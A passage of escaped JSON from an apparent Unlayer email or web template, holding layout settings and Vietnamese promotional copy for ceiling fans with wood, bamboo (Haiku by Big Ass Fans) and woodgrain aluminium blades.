th\\u00e1ng.<\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"PU-IBD8k_i\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"6SBlRLNkDw\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_s7AkbMQ6N\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 24px; font-size: 12px;\\\\\\\">Qu\\u1ea1t tr\\u1ea7n c\\u00e1nh g\\u1ed7 <strong>WOOD t\\u1ef1 nhi\\u00ean<\\/strong>. Hi\\u1ec7n nay qu\\u1ea1t tr\\u1ea7n c\\u00e1nh g\\u1ed7 t\\u1ef1 nhi\\u00ean qua x\\u1eed l\\u00fd ch\\u1ed1ng cong v\\u00eanh ho\\u1eb7c \\u0111\\u01b0\\u1ee3c x\\u1eed l\\u00fd th\\u00e0nh t\\u1ea5m nguy\\u00ean kh\\u1ed1i \\u0111ang \\u0111\\u01b0\\u1ee3c nhi\\u1ec1u ng\\u01b0\\u1eddi \\u01b0a chu\\u1ed9ng b\\u1edfi t\\u00ednh \\u0111\\u1ed9c \\u0111\\u00e1o v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi c\\u00e1c thi\\u1ebft k\\u1ebf n\\u1ed9i th\\u1ea5t hi\\u1ec7n nay.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 24px; font-size: 12px;\\\\\\\"><span style=\\\\\\\"color: #3598db; line-height: 24px;\\\\\\\"><em>V\\u1edbi \\u0111\\u1eb7c t\\u00ednh d\\u1ec5 ph\\u1ed1i t\\u00f9y ch\\u1ec9nh n\\u1ed9i th\\u1ea5t thi\\u1ebft k\\u1ebf. Ch\\u00fang t\\u00f4i l\\u00e0 nh\\u00e0 cung c\\u1ea5p c\\u00f3 uy t\\u00edn cho d\\u00f2ng qu\\u1ea1t tr\\u1ea7n n\\u00e0y t\\u1ea1i Vi\\u1ec7t Nam<\\/em><\\/span><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"EPRA7YDQro\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#236fa1\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_3\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span>\\\",\\\"calculatedWidth\\\":129,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"HuVfTruxuh\\\",\\\"contents\\\":[{\\\"id\\\":\\\"dNR6hUlp3v\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677920448078-b_wooden.jpg\\\",\\\"width\\\":800,\\\"height\\\":533},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"hctWCoSRjS\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"b-B_VA58SJ\\\",\\\"contents\\\":[{\\\"id\\\":\\\"KQNZfdl2n9\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"qdHyZzHdxN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 24px;\\\\\\\">Nh\\u1eefng chi\\u1ebfc c\\u00e1nh qu\\u1ea1t b\\u1eb1ng tre Moso tuy\\u1ec7t \\u0111\\u1eb9p c\\u1ee7a Haiku \\u0111\\u01b0\\u1ee3c l\\u00e0m th\\u1ee7 c\\u00f4ng t\\u1eeb nh\\u1eefng v\\u1eadt li\\u1ec7u \\u0111\\u01b0\\u1ee3c ch\\u1ecdn l\\u1ef1a c\\u00e2y tre \\u0111\\u1ee7 tu\\u1ed5i. V\\u1edbi 5 l\\u1edbp tre cung c\\u1ea5p \\u0111\\u1ed9 b\\u1ec1n cao v\\u00e0 t\\u1ea1o c\\u1ea3m gi\\u00e1c nh\\u1eb9 nh\\u00e0ng, t\\u1ef1 nhi\\u00ean cho b\\u1ea5t k\\u1ef3 kh\\u00f4ng gian n\\u00e0o.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\"><span style=\\\\\\\"color: #e67e23; line-height: 28px;\\\\\\\"><em><span style=\\\\\\\"font-size: 12px; line-height: 24px;\\\\\\\">Duy nh\\u1ea5t qu\\u1ea1t tr\\u1ea7n Haiku - c\\u1ee7a h\\u00e3ng Big Ass Fans USA l\\u00e0m \\u0111\\u01b0\\u1ee3c c\\u00e1nh qu\\u1ea1t tr\\u1ea7n v\\u1edbi ch\\u1ea5t li\\u1ec7u tre. H\\u00e3y li\\u00ean h\\u1ec7 bi\\u1ebft th\\u00eam chi ti\\u1ebft.<\\/span><\\/em><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"NDwH5n5zb_\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#236fa1\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_4\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span>\\\",\\\"calculatedWidth\\\":129,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"seCQJl2JpI\\\",\\\"contents\\\":[{\\\"id\\\":\\\"u__UhmkWlk\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677920949198-bamboo.jpg\\\",\\\"width\\\":800,\\\"height\\\":533},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_9\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"MPSGf7pAT7\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"T2AwAkvV85\\\",\\\"contents\\\":[{\\\"id\\\":\\\"5U52G-LXX5\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_4\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"1_Y-PHsazp\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"180%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 25.2px;\\\\\\\">Qu\\u1ea1t tr\\u1ea7n s\\u1eed d\\u1ee5ng c\\u00e1nh <strong>Woodgrain Alu<\\/strong> s\\u1ed1ng \\u0111\\u1ed9ng m\\u00e0u s\\u1eafc ph\\u00f9 h\\u1ee3p v\\u1edbi nhi\\u1ec1u thi\\u1ebft k\\u1ebf hi\\u1ec7n nay. M\\u00e0u s\\u1eafc <strong>Woodgrain Alu<\\/strong> cho c\\u1ea3m gi\\u00e1c nh\\u01b0 g\\u1ed7 th\\u1eadt v\\u00e0 c\\u00f3 \\u0111\\u1ed9 b\\u1ec1n cao, gi\\u00e1 tr\\u1ecb h\\u01a1n khi s\\u1eed d\\u1ee5ng nh\\u00f4m c\\u1ea5p m\\u00e1y bay. \\u0110\\u01b0\\u1ee3c s\\u1eed d\\u1ee5ng \\u1edf nh\\u1eefng v\\u1ecb tr\\u00ed ngo\\u00e0i tr\\u1eddi, c\\u00f4ng nghi\\u1ec7p nh\\u00e0 x\\u01b0\\u1edfng ho\\u1eb7c n\\u01a1i c\\u00f3 nhi\\u1ec7t \\u0111\\u1ed9 v\\u00e0 \\u0111\\u1ed9 \\u1ea9m cao.<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 180%;\\\\\\\"><em><span style=\\\\\\\"font-size: 12px; line-height: 25.2px;\\\\\\\">Hi\\u1ec7n nay, d\\u00f2ng s\\u1ea3n ph\\u1ea9m c\\u00e1nh v\\u00e2n g\\u1ed7 Woodgrain c\\u00f3 gi\\u00e1 th\\u00e0nh s\\u1ea3n xu\\u1ea5t r\\u1ea5t cao.\\u00a0<\\/span><\\/em><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"aZqtaldroB\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#236fa1\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_2\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">T\\u00ecm hi\\u1ec3u th\\u00eam<\\/span>\\\",\\\"calculatedWidth\\\":129,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"Kl73el7Ohg\\\",\\\"contents\\\":[{\\\"id\\\":\\\"JRov3zd7K6\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677919995846-go-alu.png\\\",\\\"width\\\":800,\\\"height\\\":533},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_5\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"TYDvAo7QXc\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KkKlsm36KR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"5XMfCB2N_C\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#272362\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 44px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"40px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Shop - QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6 T\\u1ef0 NHI\\u00caN<\\/span><\\/strong><\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":359,\\\"calculatedHeight\\\":47}},{\\\"id\\\":\\\"-3M3sEKxbS\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677919418531-du-an-tieu-bieu.png\\\",\\\"width\\\":900,\\\"height\\\":453,\\\"maxWidth\\\":\\\"100%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"jYPxTblxnF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"84%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#d8d0d0\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"YbLHtpjkh0\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jW9WWipw8d\\\",\\\"contents\\\":[{\\\"id\\\":\\\"HG30UIk3ly\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"19px 33px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Source Sans Pro\\\",\\\"value\\\":\\\"\'Source Sans Pro\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"28px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px; font-family: \'Source Sans Pro\', sans-serif;\\\\\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf 